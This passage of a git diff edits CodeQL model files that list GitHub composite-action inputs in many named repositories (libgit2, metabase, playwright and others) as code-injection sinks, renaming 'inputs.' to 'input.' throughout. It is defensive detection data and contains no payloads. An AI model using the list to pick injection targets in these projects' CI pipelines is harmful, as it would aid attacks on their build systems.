- ["lancedb/lance", "*", "input.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 735413808ec8..31cb8acad9e5 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file + - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 54334359d0e9..4c8df154d8e6 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file + - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 67826ea9c0f8..8366d5119aea 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end of file + - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_compiling", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index d05404147023..a5d99cfc5e0f 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file + - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 9020a979bbb0..e07d26e6a5f2 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file + - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 91c84fda1d18..3fe7b27d9d53 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file + - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 5031ff1e4ca5..664c28bfc553 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file + - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index fc3a7ebe253b..7b90ed202348 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index b7a664d512f3..62b31c2d3ef9 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index e86f7432a48a..427b75730abe 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 164ba02c42bf..441913730fa1 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file + - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 17fb61eeeb1b..cbb2b43a2d8e 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] - - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file + - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 8513c7da64d3..2f981b5bd63e 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index a4ab8f025d07..5d3d44e914c8 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file + - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7d82b2d3e9e7..7b41c1b27215 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file + - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index e466e17ddb41..505fbb220058 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file + - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 53881157a232..24223da3c896 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file + - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 5ee6e863db68..b529c0117f4d 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file + - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 3f5a3b658c3e..6a46669f05db 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file + - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index f5c13431126c..ec2f45f31dbf 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file + - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 4788f44e856a..3574855be3c0 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 7c66229c1746..4ee1b878e54b 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 9eb3bdcf5ebb..8453a2d415c6 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0db95acd5cd2..dc86b7959812 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 785384aa2073..ca9cc034d10f 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] - - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 24c4fb4bc707..b8aecfd5e3dc 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 72575eb73684..e7ac083da836 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ 